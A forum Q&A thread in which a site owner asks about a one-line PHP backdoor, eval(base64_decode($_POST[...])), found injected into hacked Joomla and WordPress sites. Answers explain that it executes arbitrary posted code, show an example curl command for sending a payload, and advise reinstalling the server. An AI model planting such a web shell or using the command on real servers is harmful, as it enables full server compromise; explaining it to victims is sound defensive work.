# base64_decode injected code inside php file

Tags: php, security

Sorry if this is the wrong place to ask this question but I wonder what the below code will do. I see this kind of code often. I do not know what this code do. Hackers usually inject this kind of code in many pages of joomla and wordpress website after they hack the site. If any one can explain the code then I'll be gald.

```
<?php eval(base64_decode($_POST['na7fe23']));?>
```

Answer (score 2, accepted):

If someone posts a chunk of PHP-code in the field 'na7fe23' to this script, then that posted code will be executed on your server.

This basically allows anyone to execute any PHP script on your server, so you're seriously compromised.

Comment: so where do I find this na7fe23. Is there any methods to remove these kind of code and/or scanner?

Comment: This na7fe23 is just a random field. Someone will just do `cUrl http://example.com/yourscript.php 'POST' -d na7fe23=BIGCHUNKOFBASE64ENCODEDPHPCODE` or something like that from their command line, and you're screwed. There's no way to check what that code will be. Also, you cannot know what other backdoors on your server have been created already. I would unplug it from the internet now, and basically re-install it before plugging it back in. Depending on the permissions the web server user has, everything on that server and possibly on the rest of your network might be in danger.

Comment: I am already screwed. Anyway thanks for the info. I really appreciate. Thanks again :)